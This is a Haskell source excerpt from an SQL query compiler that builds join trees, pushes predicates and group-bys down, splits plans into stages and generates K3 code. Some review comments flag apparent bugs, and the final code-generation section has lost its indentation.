    unaryNode n@(Tref _ nm al) = do
      let tid = sqltablealias ("__" ++ sqlnm nm) al
      t <- sqrlkupM $ sqlnm nm
      rt <- taliascolM al t
      tsid <- sqgextSchemaM tid rt
      return (Node (PTable (sqlnm nm) tsid (Just n) Nothing []) [], [])

    unaryNode (SubTref _ q al) = do
      qcl <- query q
      nqsid <- planSchema $ qcplan qcl
      qalsid <- outputScope nqsid "__RN" (Just al)
      return (Node (PSubquery qalsid qcl) [], qcfree qcl)

    unaryNode (JoinTref _ jlt nat jointy jrt onE jal) = do
      (lhs, lfvs) <- unaryNode jlt
      (rhs, rfvs) <- unaryNode jrt
      (lsid, rsid) <- (,) <$> treeSchema lhs <*> treeSchema rhs
      jpsid <- mergeScopes lsid rsid
      (jeq, jp, pfvs, psq) <- joinPredicate jpsid lsid rsid onE
      josid <- aliasedOutputScope jpsid "__JR" (Just jal)
      return (Node (PJoin jpsid josid (Just (nat,jointy)) jeq jp psq []) [lhs, rhs], nub $ lfvs ++ rfvs ++ pfvs)

    unaryNode (FunTref _ _ _) = throwE "Table-valued functions are not supported"
-- | Extracts join conditions from an ON/USING clause: returns separable
--   equijoin pairs, residual (non-separable) predicates, free variables, and
--   subquery bindings discovered in the condition.
joinPredicate :: ScopeId -> ScopeId -> ScopeId -> OnExpr -> SQLParseM ([(ScalarExpr, ScalarExpr)], ScalarExprList, [AttrPath], SubqueryBindings)
joinPredicate sid lsid rsid (Just (JoinOn _ joinE)) = do
  conjuncts <- splitConjuncts joinE
  (sepcons, nsepcons) <- classifyConjuncts sid lsid rsid conjuncts >>= return . partitionEithers
  let (lseps, rseps) = unzip sepcons
  (lcvs, lsubqs) <- varsAndQueries (Just sid) lseps
  (rcvs, rsubqs) <- varsAndQueries (Just sid) rseps
  (cvs, subqs) <- varsAndQueries (Just sid) nsepcons
  return (sepcons, nsepcons, nub $ lcvs ++ rcvs ++ cvs, nub $ lsubqs ++ rsubqs ++ subqs)

-- USING (cols): expand each column to a qualified equality over the two
-- join input qualifiers recorded in the scope frame.
joinPredicate sid _ _ (Just (JoinUsing _ nmcs)) = do
  (_, _, [[lqual], [rqual]]) <- sqclkupM sid
  let eqs = map (\i -> (QIdentifier emptyAnnotation [Nmc lqual, i], QIdentifier emptyAnnotation [Nmc rqual, i])) nmcs
  return (eqs, [], [], [])

joinPredicate _ _ _ _ = return ([], [], [], [])
-- | Flattens nested "!and" applications into a list of conjuncts; any other
--   expression stands as a single conjunct.
splitConjuncts :: ScalarExpr -> SQLParseM ScalarExprList
splitConjuncts expr =
  case expr of
    FunCall _ nm [lhs, rhs] | sqlnm nm == "!and" ->
      (++) <$> splitConjuncts lhs <*> splitConjuncts rhs
    _ -> return [expr]
-- | Classifies each conjunct as a separable equijoin pair (Left) or a
--   residual predicate (Right), relative to the base relations of the left
--   and right join inputs.
classifyConjuncts :: ScopeId -> ScopeId -> ScopeId -> ScalarExprList -> SQLParseM [Either (ScalarExpr, ScalarExpr) ScalarExpr]
classifyConjuncts sid lsid rsid es = do
  lrels <- baseRelationsS lsid
  rrels <- baseRelationsS rsid
  mapM (classifyConjunct sid lsid rsid lrels rrels) es
-- | Classifies one conjunct: an equality whose two sides depend on disjoint
--   join inputs becomes a separable equijoin pair (Left, ordered
--   left-side-first); anything else is a residual predicate (Right).
classifyConjunct :: ScopeId -> ScopeId -> ScopeId -> [Identifier] -> [Identifier] -> ScalarExpr
                 -> SQLParseM (Either (ScalarExpr, ScalarExpr) ScalarExpr)
classifyConjunct sid lsid rsid lrels rrels e@(FunCall _ nm args) = do
  let fn = sqlnm nm
  case sqloperator fn args of
    (Just (BinaryOp OEqu x y)) -> do
      (xrels, yrels) <- (,) <$> baseRelationsE sid x <*> baseRelationsE sid y
      classify x y xrels yrels
    _ -> return $ Right e
  where
    classify x y (nub -> xrels) (nub -> yrels)
      | xrels `intersect` lrels == xrels && yrels `intersect` rrels == yrels = do
          -- NOTE(review): nx/ny are rebased onto the per-side scopes but then
          -- discarded — the original x/y are returned. Confirm whether
          -- `Left (nx, ny)` was intended here (and symmetrically below).
          [nx] <- rebaseExprs sid [lsid] [x]
          [ny] <- rebaseExprs sid [rsid] [y]
          return $ Left (x,y)
      | xrels `intersect` rrels == xrels && yrels `intersect` lrels == yrels = do
          [ny] <- rebaseExprs sid [lsid] [y]
          [nx] <- rebaseExprs sid [rsid] [x]
          return $ Left (y,x)
      | otherwise = return $ Right e
classifyConjunct _ _ _ _ _ e = return $ Right e
-- | Splits a select list into plain projections and aggregates, and builds
--   the corresponding output scope for the aggregate path.
aggregatePath :: Maybe ScopeId -> SelectList -> SQLParseM (SelectItemList, SelectItemList, ScopeId)
aggregatePath sidOpt (SelectList _ selectL) = do
  classified <- mapM classifySelectItem selectL
  let (prjs, aggs) = partitionEithers classified
  asid <- aggregateSchema sidOpt prjs aggs
  return (prjs, aggs, asid)
-- | Tags a select item as an aggregate (Right) or a plain projection (Left).
classifySelectItem :: SelectItem -> SQLParseM (Either SelectItem SelectItem)
classifySelectItem si = do
  agg <- isAggregate $ case si of
           SelExp _ e       -> e
           SelectItem _ e _ -> e
  return $ if agg then Right si else Left si
-- TODO: AggregateFn, Interval, LiftOperator, WindowFn
-- | Collects the free variables (attribute paths not resolvable in the given
--   scope) and subquery bindings appearing in a list of expressions.
varsAndQueries :: Maybe ScopeId -> ScalarExprList -> SQLParseM ([AttrPath], SubqueryBindings)
varsAndQueries sidOpt exprs = processMany exprs
  where process (FunCall _ _ args) = processMany args
        -- Identifiers that fail scope lookup are reported as free variables.
        process (Identifier _ (sqlnmcomponent -> i)) = trypath sidOpt (return ([[i]], [])) (const $ return ([], [])) [i]
        process (QIdentifier _ (sqlnmpath -> path)) = trypath sidOpt (return ([path], [])) (const $ return ([], [])) path
        process (Case _ whens elseexpr) = caseList (maybe [] (:[]) elseexpr) whens
        process (CaseSimple _ expr whens elseexpr) = caseList ([expr] ++ maybe [] (:[]) elseexpr) whens
        process e@(Exists _ q) = bindSubquery e q
        process e@(ScalarSubQuery _ q) = bindSubquery e q
        process (InPredicate _ ine _ (InList _ el)) = processMany $ ine : el
        process e@(InPredicate _ ine _ (InQueryExpr _ q)) = do
          (invs, inbs) <- process ine
          (qvs, qbs) <- bindSubquery e q
          return (invs ++ qvs, inbs ++ qbs)
        process (Cast _ e _) = process e
        process (Extract _ _ e) = process e
        process _ = return ([], [])

        -- NOTE(review): concatR appears unused within this definition.
        concatR (a,b) (c,d) = (nub $ a++c, b++d)
        concatMany l = return $ (nub . concat) *** concat $ unzip l
        processMany el = mapM process el >>= concatMany

        -- Plans a subquery under a fresh "__subquery<N>" symbol; the
        -- subquery's own free variables propagate outward when unresolvable.
        bindSubquery e q = do
          sym <- ssqsextM
          qcl <- query q
          vbl <- mapM (\path -> trypath sidOpt (return ([path], [])) (const $ return ([], [])) path) $ qcfree qcl
          return (concat $ map fst vbl, [(e, ("__subquery" ++ show sym, qcl))])

        caseList extra whens = do
          rl <- (\a b -> a ++ [b]) <$> mapM (\(l,e) -> processMany $ l++[e]) whens <*> processMany extra
          concatMany rl
-- | Pushes WHERE conjuncts down the join tree to the lowest node covering
--   each predicate's base relations; predicates no node accepts are returned
--   as the remainder.
predicatePushdown :: Maybe ScopeId -> ScalarExprList -> PlanTree -> SQLParseM (PlanTree, ScalarExprList)
predicatePushdown Nothing preds jtree = return (jtree, preds)
predicatePushdown (Just sid) preds jtree = foldM push (jtree, []) preds
  where
    push (t, remdr) p = do
      rels <- baseRelationsE sid p
      (nt, accs) <- onRelLCA t rels $ inject p
      -- A True accumulator flags a node that refused the predicate.
      return (nt, if any id accs then remdr ++ [p] else remdr)

    -- Table leaf: rebase the predicate onto the table scope and extend the
    -- node's selection chain.
    inject p _ n@(ttag -> PTable tid tsid trOpt bmOpt chains) = do
      [np] <- rebaseExprs sid [tsid] [p]
      (_, npqbs) <- varsAndQueries (Just tsid) [np]
      return (replaceData n $ PTable tid tsid trOpt bmOpt $ pcextSelect sid npqbs np chains, False)

    -- Join node: separable equalities extend the equijoin list; all others
    -- are appended as non-equi join predicates.
    inject p [lrels, rrels] n@(Node (PJoin psid osid jt jeq jp jpb chains) [l,r]) = do
      (lsid, rsid) <- (,) <$> treeSchema l <*> treeSchema r
      [np] <- rebaseExprs sid [psid] [p]
      sepE <- classifyConjunct sid lsid rsid lrels rrels np
      (njeq, njp, nsubqbs) <- case sepE of
        Left (lsep,rsep) -> do
          (_, lqbs) <- varsAndQueries (Just lsid) [lsep]
          (_, rqbs) <- varsAndQueries (Just rsid) [rsep]
          return (jeq ++ [(lsep,rsep)], jp, lqbs ++ rqbs)
        Right nonsep -> do
          (_, rqbs) <- varsAndQueries (Just psid) [nonsep]
          return (jeq, jp ++ [nonsep], rqbs)
      return (replaceData n $ PJoin psid osid jt njeq njp (jpb ++ nsubqbs) chains, False)

    -- Any other node rejects the push; the predicate stays in the remainder.
    inject _ _ n = return (n, True)
-- | Applies a function at the lowest node whose subtree covers all of the
--   given base relations, rebuilding the tree bottom-up. Returns the rebuilt
--   tree and the results from each application site.
onRelLCA :: PlanTree -> [Identifier] -> ([[Identifier]] -> PlanTree -> SQLParseM (PlanTree, a)) -> SQLParseM (PlanTree, [a])
onRelLCA t rels f = do
  (_,_,x,y) <- foldMapTree go (False, [], [], []) t
  return (head x, y)
  where
    -- Once applied (True flag), just rebuild parents without reapplying.
    go (conc -> (True, _, nch, acc)) n = return (True, [], [replaceCh n nch], acc)
    -- Table leaf also contributes its own ("__"-prefixed) relation name.
    go (conc -> (False, relsByCh@(concat -> chrels), nch, acc)) n@(ttag -> PTable (("__" ++) -> i) _ _ _ _)
      | rels `intersect` (chrels ++ [i]) == rels = f relsByCh (replaceCh n nch) >>= \(n',r) -> return (True, [], [n'], acc++[r])
      | otherwise = return (False, chrels++[i], [replaceCh n nch], acc)
    go (conc -> (False, relsByCh@(concat -> chrels), nch, acc)) n
      | rels `intersect` chrels == rels = f relsByCh (replaceCh n nch) >>= \(n', r) -> return (True, [], [n'], acc++[r])
      | otherwise = return (False, chrels, [replaceCh n nch], acc)
    go _ _ = throwE "onRelLCA pattern mismatch"
    -- Merge child results: applied-flag is any child's flag; relation lists,
    -- rebuilt children and application results are concatenated.
    conc cl = (\(a,b,c,d) -> (any id a, b, concat c, concat d)) $ unzip4 cl
-- | Pushes a group-by (and decomposable aggregates) below equijoins whenever
--   the grouping and aggregate attributes can be localized to a single join
--   input. Returns the rewritten tree and the replacement top-level
--   aggregates.
groupByPushdown :: PlanTree -> ScopeId -> SelectItemList -> SelectItemList -> SQLParseM (PlanTree, SelectItemList)
groupByPushdown jtree s g a = walk s g a jtree
  where
    walk sid gbs aggs e@(Node n ch) = do
      let onRoot = n == ttag jtree
      continue <- trace (boxToString $ ["GB walk"] %$ prettyLines e) $ trypush sid gbs aggs ch n
      case continue of
        Left doExtend -> complete onRoot doExtend aggs sid gbs aggs $ Node n ch
        Right (doExtend, naggs, chsga) -> do
          nch <- mapM (\((cs,cg,ca), c) -> walk cs cg ca c >>= return . fst) $ zip chsga ch
          complete onRoot doExtend naggs sid gbs naggs $ Node n nch

    -- Decide whether to push through a join: requires an equijoin, no
    -- aggregates already staged on the node's chains, and no overlap between
    -- the join's attributes and the aggregates' attributes.
    trypush sid gbs aggs [lt,rt] n@(PJoin psid osid _ jeq jp _ chains)
      | not $ null jeq = do
          jptrs <- joinAttrs psid osid jeq jp chains
          aptrs <- aggAttrs psid sid aggs
          let caggs = chainAggregates osid chains
          let overlaps = jptrs `intersect` aptrs
          case (caggs, overlaps) of
            ([],[]) -> do
              (lsid, rsid) <- (,) <$> treeSchema lt <*> treeSchema rt
              (lgbs, rgbs, remgbs) <- localizeJoin lsid rsid psid sid gbs jptrs
              (laggs, raggs, remaggs, naggs) <- decomposeAggregates lsid rsid psid sid aggs
              -- Push only when everything localizes to one side or the other.
              if debugAggDecomp psid osid lgbs rgbs remgbs laggs raggs remaggs naggs $ not (null remgbs && null remaggs)
                then return $ Left True
                else return $ Right (True, naggs, [(lsid, lgbs, laggs), (rsid, rgbs, raggs)])
            (_,_) -> return $ Left $ null caggs
      | otherwise = return $ Left $ null $ chainAggregates osid chains

    trypush _ _ _ _ (PJoin _ _ _ _ _ _ _) = throwE "Invalid binary join node"
    trypush _ _ _ ch n@(PTable _ tsid _ _ chains) = return $ Left $ null $ chainAggregates tsid chains
    trypush _ _ _ ch n@(PSubquery _ _) = return $ Left True

    -- NOTE(review): the call site above passes ... laggs raggs remaggs naggs
    -- while this definition names the last two parameters naggs remaggs, so
    -- the "naggs"/"remaggs" counts in the trace are swapped relative to the
    -- caller. Trace output only; confirm intended order.
    debugAggDecomp psid osid lgbs rgbs remgbs laggs raggs naggs remaggs m =
      trace (unwords ["Agg decomp", show psid, show osid
                     , "GBs:", show $ length lgbs, show $ length rgbs, show $ length remgbs
                     , "Aggs:", show $ length laggs, show $ length raggs, show $ length naggs, show $ length remaggs]) m

    -- Rebuild the node with refreshed input schemas, optionally extending its
    -- chain with the pushed group-by; only the root returns replacement aggs.
    complete onRoot doExtend raggs sid gbs aggs (Node n ch) = do
      n' <- refreshInputSchema n ch
      n'' <- if not onRoot && doExtend then pcextGroupBy gbs aggs n' else return n'
      trace (boxToString $ ["Completed"] %$ prettyLines (Node n'' ch)) $
        return (Node n'' ch, if onRoot then raggs else [])

    chainAggregates sid chains = concatMap snd $ pcAggExprs sid chains

    -- All attribute pointers referenced by the join's predicates and its
    -- non-aggregate chain expressions, rebased onto the join scope.
    joinAttrs dsid sid1 eqexprs neqexprs chains = do
      eqptrs <- mapM (\(x,y) -> (++) <$> exprAttrs dsid x <*> exprAttrs dsid y) eqexprs >>= return . concat
      neqptrs <- mapM (exprAttrs dsid) neqexprs >>= return . concat
      let sidAndExprs = pcNonAggExprs sid1 chains
      exprptrs <- concatMapM (\(ssid,el) -> concatMapM (exprAttrs ssid) el) sidAndExprs
      rexprptrs <- rebaseAttrs dsid exprptrs
      return $ nub $ eqptrs ++ neqptrs ++ rexprptrs

    aggAttrs dsid ssid aggs = do
      aggptrs <- concatMapM (exprAttrs ssid) $ projectionexprs aggs
      rebaseAttrs dsid $ nub aggptrs

    -- Split group-by expressions (plus join attributes) into left-local,
    -- right-local and non-localizable sets.
    localizeJoin lsid rsid psid sid gbs jptrs = do
      gbptrs <- concatMapM (exprAttrs sid) $ projectionexprs gbs
      rgbptrs <- rebaseAttrs psid gbptrs
      localizeAttrs lsid rsid psid $ rgbptrs ++ jptrs

    localizeAttrs lsid rsid psid ptrs = do
      nodes <- mapM sqglkupM $ nub $ ptrs
      (lexprs, rexprs, rest) <- localizeInputExprs psid lsid rsid $ map (\n -> Identifier emptyAnnotation $ Nmc $ adnn n) nodes
      return (map mkprojection lexprs, map mkprojection rexprs, rest)

    -- Decompose each aggregate into per-side partial aggregates plus a final
    -- recombining aggregate, when its attributes localize to one side.
    decomposeAggregates lsid rsid psid sid aggs = do
      (aggexprs, aggFns) <- aggregateexprs aggs
      raggptrs <- mapM (\e -> exprAttrs sid e >>= rebaseAttrs psid) aggexprs
      ragglocals <- mapM (localizeAttrs lsid rsid psid) raggptrs
      foldM (decomposeAggByFn lsid rsid sid) ([], [], [], []) $ zip3 ragglocals (zip aggs aggexprs) aggFns

    decomposeAggByFn lsid rsid sid (lacc, racc, acc, nacc) ((ldeps, rdeps, deps), (agg,e), fn) =
      if null deps then do
        (eagg, cagg, nagg) <- rewriteAgg sid (if null rdeps then lsid else rsid) fn agg e
        let (nlacc, nracc) = if null rdeps then (lacc ++ [eagg], racc ++ [cagg]) else (lacc ++ [cagg], racc ++ [eagg])
        return (nlacc, nracc, acc, nacc ++ [nagg])
      else return (lacc, racc, acc ++ [e], nacc)

    -- Partial aggregate on one side, a count on the other, and a final
    -- aggregate ("*" call) recombining the two fresh "__AGGD" columns.
    rewriteAgg ssid dsid aggFn agg e = do
      ne <- rebaseExprs ssid [dsid] [e] >>= return . head
      (ei, ci) <- (\a b -> ("__AGGD" ++ show a, "__AGGD" ++ show b)) <$> saggsextM <*> saggsextM
      (,,) <$> mkaggregate aggFn (SelectItem emptyAnnotation e $ Nmc ei) ne
           <*> mkaggregate AggCount (SelectItem emptyAnnotation e $ Nmc ci) (Star emptyAnnotation)
           <*> mkaggregate aggFn agg (FunCall emptyAnnotation (Name emptyAnnotation [Nmc "*"])
                                        [Identifier emptyAnnotation $ Nmc ei
                                        ,Identifier emptyAnnotation $ Nmc ci])

    concatMapM f x = mapM f x >>= return . concat
-- | Splits query plans into materialization stages: each aggregate-producing
--   chain segment becomes its own SQLStage declaration plus a staged query,
--   yielding the staged declarations and the stage dependency graph.
sqlstage :: [SQLDecl] -> SQLParseM ([SQLDecl], StageGraph)
sqlstage stmts = mapM stage stmts >>= return . (concat *** concat) . unzip
  where
    stage s@(SQLRel _) = return ([s], [])
    stage s@(SQLStage _) = throwE "SQLStage called with existing stage declarations"
    stage (SQLQuery plan) = stagePlan plan >>= \(_,l,g) -> return (l,g)

    stagePlan (QueryPlan tOpt chains stgOpt) = do
      (ntOpt, (tstages, tstgg)) <- maybe (return (Nothing, ([], []))) (\t -> stageTree t >>= return . first Just) tOpt
      (nplan, cstages, nstgg) <- stagePlanChains tstgg ntOpt stgOpt chains
      return (nplan, tstages ++ cstages, nstgg)

    stageTree jtree = (\((a,b),c) -> (c,(a,b))) <$> foldMapRebuildTree stageNode ([],[]) jtree

    -- Joins are cut into a staged join query feeding a fresh staged table;
    -- the non-aggregate chain prefix stays with the join.
    stageNode (aconcat -> (acc, [lstgg,rstgg])) ch n@(ttag -> PJoin psid osid jt jeq jp jpb chains) = do
      stgid <- stgsextM >>= return . stageId . show
      let (jchains, schains) = nonAggregatePrefix chains
      let jtOpt = Just $ Node (PJoin psid osid jt jeq jp jpb jchains) ch
      let jstage = SQLQuery $ QueryPlan jtOpt [] (Just stgid)
      let nt = Node (PTable stgid osid Nothing Nothing []) []
      let jstgg = stgEdges [lstgg, rstgg] stgid
      (st, nstages, nstgg) <- stageNodeChains jstgg nt schains
      let nstgg' = lstgg ++ rstgg ++ nstgg
      kt <- k3ScopeType osid bmelem
      return ((acc ++ [SQLStage (stgid, kt), jstage] ++ nstages, nstgg'), st)

    -- Tables keep their non-aggregate chain prefix inline; the aggregate
    -- suffix is staged.
    stageNode (aconcat -> (acc, stgg)) ch n@(ttag -> PTable i tsid trOpt bmOpt chains) = do
      let (tchains, schains) = nonAggregatePrefix chains
      let nt = Node (PTable i tsid trOpt bmOpt tchains) ch
      (st, nstages, nstgg) <- stageNodeChains [Left i] nt schains
      return ((acc ++ nstages, concat stgg ++ nstgg), st)

    stageNode (aconcat -> (acc, stgg)) ch n@(ttag -> PSubquery osid (QueryClosure fvs plan)) = do
      (nplan, nstages, nstgg) <- stagePlan plan
      return ((acc ++ nstages, concat stgg ++ nstgg), Node (PSubquery osid $ QueryClosure fvs nplan) ch)

    stageNode _ _ n = throwE $ boxToString $ ["Invalid tree node for staging"] %$ prettyLines n

    stagePlanChains stgg Nothing stgOpt chains = return (QueryPlan Nothing chains stgOpt, [], stgg)
    stagePlanChains stgg (Just t) stgOpt chains = do
      let (pchains, schains) = nonAggregatePrefix chains
      nt <- foldM (flip pcext) t pchains
      (st, nstages, nstgg) <- stageNodeChains stgg nt schains
      return (QueryPlan (Just st) [] stgOpt, nstages, nstgg)

    -- Each aggregate path becomes a staged query whose result feeds a fresh
    -- staged table; non-aggregate paths are simply appended to the tree.
    stageNodeChains stgg t chains = foldM onPath (t,[],stgg) chains
      where onPath (t, acc, stggacc) p = do
              pt <- pcext p t
              if isNonAggregatePath p
                then return (pt, acc, stggacc)
                else do
                  stgid <- stgsextM >>= return . stageId . show
                  let pstage = SQLQuery $ QueryPlan (Just pt) [] (Just stgid)
                  osid <- treeSchema pt
                  bm <- treeBindingMap pt
                  kt <- k3ScopeType osid bm
                  -- Aggregate stages materialize a zero-initialized record type.
                  rkt <- if not $ isAggregatePath p
                           then return kt
                           else do
                             et <- telemM kt
                             case tnc et of
                               (TRecord ids, ch) -> zeroT $ zip ids ch
                               _ -> throwE "Invalid k3 aggregate plan type"
                  let nt = Node (PTable stgid osid Nothing (Just bm) []) []
                  let nstgg = stggacc ++ stgEdges [stggacc] stgid
                  return (nt, acc ++ [SQLStage (stgid, rkt), pstage], nstgg)

    stgEdges ll i = map (Right . (,i)) $ catMaybes $ stgCh ll
    stgCh ll = map (\l -> if null l then Nothing else Just $ either id snd $ last l) ll

    -- Longest prefix of non-aggregate paths, and the remaining suffix.
    nonAggregatePrefix chains = fst $ foldl accum (([],[]), False) chains
      where accum ((nagg,agg), found) p | not found && isNonAggregatePath p = ((nagg ++ [p], agg), False)
                                        | otherwise = ((nagg, agg++[p]), True)

    aconcat = (concat *** id) . unzip
sqlcodegen :: Bool -> ([SQLDecl], StageGraph) -> SQLParseM (K3 Declaration)
sqlcodegen distributed (stmts, stgg) = do
(decls, inits) <- foldM cgstmt ([], []) stmts
initDecl <- mkInit decls
return $ DC.role "__global" $ [master] ++ decls ++ mkPeerInit inits ++ initDecl
where
trig i = i ++ "_trigger"
(leaves, edges) = partitionEithers stgg
stagechildren = foldl (\acc (s,t) -> Map.insertWith (++) t [s] acc) Map.empty edges
stageinits = Map.foldlWithKey (\acc p ch -> if ch `intersect` leaves == ch then acc ++ [p] else acc) [] stagechildren
cgstmt (dacc, iacc) (SQLRel (i, t)) = do
gt <- twrapcolelemM t
(ldecls, linit) <- mkLoader (i,t)
return (dacc ++ [DC.global i gt Nothing] ++ ldecls, iacc ++ [linit])
cgstmt (dacc, iacc) (SQLStage (i, t)) = return (dacc ++ [DC.global i (mutT t) Nothing], iacc)
cgstmt (dacc, iacc) (SQLQuery plan) = do
(e,sid,bm,merge) <- cgplan plan
t <- k3PlanType bm plan
(outid, trigid, decls) <- case qstageid plan of
Just i -> return (i, trig i, [])
Nothing -> do
s <- stgsextM >>= return . show
let i = materializeId s
return (i, stageId s, [DC.global i (mutT t) Nothing])
let execStageF i e = case lookup i edges of
Nothing -> return e
Just next ->
let nextE = EC.send (EC.variable $ trig next) (EC.variable "me") EC.unit
execE = EC.block [e, nextE]
in annotateTriggerBody i plan merge execE
trigBodyE <- execStageF outid $ EC.assign outid e
return (dacc ++ decls ++ [ DC.trigger trigid TC.unit $ EC.lambda "_" trigBodyE ], iacc)
cgclosure (QueryClosure free plan)
| null free = cgplan plan
| otherwise = throwE "Code generation not supported for correlated queries"
cgplan (QueryPlan tOpt chains _) = do
esbmOpt <- maybe (return Nothing) (\t -> cgtree t >>= return . Just) tOpt
cgchains esbmOpt chains
cgtree n@(Node (PJoin psid osid jtOpt jeq jp jsubqbs chains) [l,r]) = do
sf@(_,_,[[lqual],[rqual]]) <- sqclkupM psid
cqaenv <- partitionCommonQualifedAttrEnv sf
(lexpr, lsid, lbm, _) <- cgtree l
(rexpr, rsid, rbm, _) <- cgtree r
(li, ri) <- (,) <$> uniqueScopeQualifier lsid <*> uniqueScopeQualifier rsid
jbm <- bindingMap [(lqual, Map.lookup [lqual] cqaenv, lbm), (rqual, Map.lookup [rqual] cqaenv, rbm)]
case (jeq, jp) of
((_:_), []) -> do
let (lexprs, rexprs) = unzip jeq
lkbodyE <- mapM (cgexpr jsubqbs Nothing lsid) lexprs >>= \es -> bindE lsid lbm (Just li) $ tupE es
rkbodyE <- mapM (cgexpr jsubqbs Nothing rsid) rexprs >>= \es -> bindE rsid rbm (Just ri) $ tupE es
obodyE <- concatE psid jbm Nothing
let lkeyE = EC.lambda lqual lkbodyE
let rkeyE = EC.lambda rqual rkbodyE
let outE = EC.lambda lqual $ EC.lambda rqual obodyE
joinKV <- isKVBindingMap rbm
let joinE = EC.applyMany (EC.project (if joinKV then "equijoin_kv" else "equijoin") lexpr) [rexpr, lkeyE, rkeyE, outE]
cgchains (Just (joinE, osid, bmelem, Nothing)) chains
(_, _) -> do
mbodyE <- case jp of
[] -> bindE psid jbm Nothing $ EC.constant $ CBool True
(h:t) -> cgexpr jsubqbs Nothing psid h >>= \he -> foldM (cgconjunct jsubqbs psid) he t >>= \e -> bindE psid jbm Nothing e
obodyE <- concatE psid jbm Nothing
let matchE = EC.lambda lqual $ EC.lambda rqual mbodyE
let outE = EC.lambda lqual $ EC.lambda rqual obodyE
joinKV <- isKVBindingMap rbm
let joinE = EC.applyMany (EC.project (if joinKV then "join_kv" else "join") lexpr) [rexpr, matchE, outE]
cgchains (Just (joinE, osid, bmelem, Nothing)) chains
cgtree (Node (PSubquery _ qcl) ch) = cgclosure qcl
cgtree n@(Node (PTable i tsid _ bmOpt chains) []) = cgchains (Just (EC.variable i, tsid, maybe bmelem id bmOpt, Nothing)) chains
cgtree _ = throwE "Invalid plan tree"
cgchains esbmOpt chains = do
resbmOpt <- foldM cgchain esbmOpt chains
maybe (throwE "Invalid chain result") return resbmOpt
cgchain (Just (e,sid,bm,_)) (PlanCPath osid selects gbs prjs aggs having subqbs) = do
fe <- case selects of
[] -> return e
l -> foldM (filterChainE sid bm subqbs) e l
case (gbs, prjs, aggs, having) of
([], [], [], Nothing) -> return $ Just (fe, osid, bm, Nothing)
([], _, _, Nothing) -> cgselectlist sid osid bm subqbs fe prjs aggs
(h:t, _, _, _) -> cggroupby sid osid bm subqbs fe gbs prjs aggs having
_ -> throwE $ "Invalid group-by and having expression pair"
cgchain Nothing (PlanCPath osid [] [] prjs [] Nothing []) = cglitselectlist [] osid prjs
cgchain Nothing _ = throwE "Invalid scalar chain component"
cggroupby sid osid bm subqbs e gbs prjs aggs having = do
i <- uniqueScopeQualifier sid
o <- uniqueScopeQualifier osid
gbie <- (\f -> foldM f (0,[]) gbs >>= return . snd) $ \(i,acc) gbe -> do
gbke <- cgexpr subqbs Nothing sid gbe
case gbe of
(Identifier _ (Nmc n)) -> return (i, acc++[(n,gbke)])
_ -> return (i+1, acc++[("f" ++ show i, gbke)])
gbbodyE <- bindE sid bm (Just i) $ case gbie of
[] -> EC.unit
[(_,e)] -> e
_ -> recE gbie
let groupF = EC.lambda i gbbodyE
(prjsymidx, prjie) <- cgprojections subqbs 0 sid prjs
prjt <- mapM (scalarexprType $ Just sid) $ projectionexprs prjs
unless (all (\((_,a), (_,b)) -> compareEAST a b) $ zip prjie gbie) $ throwE "Mismatched groupbys and projections"
(_, aggie, mergeie) <- cgaggregates subqbs prjsymidx sid aggs
aggbodyE <- bindE sid bm (Just i) $ case aggie of
[] -> EC.variable "acc"
[(_,e)] -> EC.applyMany e [EC.variable "acc"]
_ -> recE $ map (aggE "acc") aggie
let aggF = EC.lambda "acc" $ EC.lambda i $ aggbodyE
mergeF <- case mergeie of
[] -> return $ EC.lambda "_" $ EC.lambda "_" $ EC.unit
[(_,e)] -> return $ e
_ -> return $ EC.lambda "acc1" $ EC.lambda "acc2"
$ recE $ map (aggMergeE "acc1" "acc2") mergeie
aggt <- mapM (aggregateType $ Just sid) $ projectionexprs aggs
let aggit = zip (map fst aggie) aggt
zE <- zeroE aggit
let rE = EC.applyMany (EC.project "group_by" e) [groupF, aggF, zE]
let prefixTypePath i pfx l = case l of
[] -> (i+1, [("f" ++ show i, [pfx])])
[j] -> (i, [(j, [pfx])])
_ -> (i, map (\j -> (j, [pfx, j])) l)
let (nidx, keyPaths) = prefixTypePath (0::Int) "key" $ map fst prjie
let (_, valPaths) = prefixTypePath nidx "value" $ map fst aggie
let rbm = BMTFieldMap $ Map.fromList $ keyPaths ++ valPaths
hve <- maybe (return Nothing) (havingE aggie osid rbm o) having
let hrE = maybe rE (\h -> EC.applyMany (EC.project "filter" rE) [EC.lambda o h]) hve
return $ Just (hrE, osid, rbm, Just mergeF)
where havingE aggie osid rbm o e = do
let aggei = map (\(a,b) -> (b,a)) aggie
he <- cgexpr subqbs (Just $ subAgg aggei) osid e
hbodyE <- bindE osid rbm (Just o) $ he
return $ Just hbodyE
subAgg aggei e = do
case lookup e aggei of
Nothing -> return e
Just i -> return $ EC.variable i
cgselectlist sid osid bm subqbs e prjs aggs = case (prjs, aggs) of
(p, []) -> do
i <- uniqueScopeQualifier sid
mbodyE <- cgprojections subqbs 0 sid prjs >>= \(_, fields) -> bindE sid bm (Just i) $ recE fields
let prjE = EC.applyMany (EC.project "map" e) [EC.lambda i mbodyE]
return $ Just (prjE, osid, bmelem, Nothing)
([], a) -> do
i <- uniqueScopeQualifier sid
(_, aggfields, mergeie) <- cgaggregates subqbs 0 sid aggs
aggbodyE <- bindE sid bm (Just i) $ case aggfields of
[] -> EC.variable "acc"
[(_,e)] -> EC.applyMany e [EC.variable "acc"]
_ -> recE $ map (aggE "acc") aggfields
let aggF = EC.lambda "acc" $ EC.lambda i $ aggbodyE
mergeF <- case mergeie of
[] -> return $ EC.lambda "_" $ EC.lambda "_" $ EC.unit
[(_,e)] -> return $ e
_ -> return $ EC.lambda "acc1" $ EC.lambda "acc2"
$ recE $ map (aggMergeE "acc1" "acc2") mergeie
rElemT <- scopeType osid >>= telemM
zE <- case tnc rElemT of
(TRecord ids, ch) -> zeroE $ zip ids ch
_ -> throwE "Invalid aggregate result type"
let rexpr = EC.applyMany (EC.project "fold" e) [aggF, zE]
return $ Just (rexpr, osid, BMNone, Just mergeF)
_ -> throwE $ "Invalid mutually exclusive projection-aggregate combination"
      -- TODO: we should not pass down subqbs here, or state assumption that subqbs is not used.
cglitselectlist subqbs sid prjs = cgprojections subqbs 0 sid prjs >>= \(_, ide) -> return $ Just (recE ide, sid, BMNone, Nothing)
cgprojections subqbs i sid l = foldM (cgprojection subqbs sid) (i, []) l
cgprojection subqbs sid (i, acc) si = do
(ni, n) <- selectItemId i si
cgaccprojection subqbs sid acc ni n $ projectionexpr si
cgaccprojection subqbs sid acc i n e = cgexpr subqbs Nothing sid e >>= \rE -> return (i, acc ++ [(n, rE)])
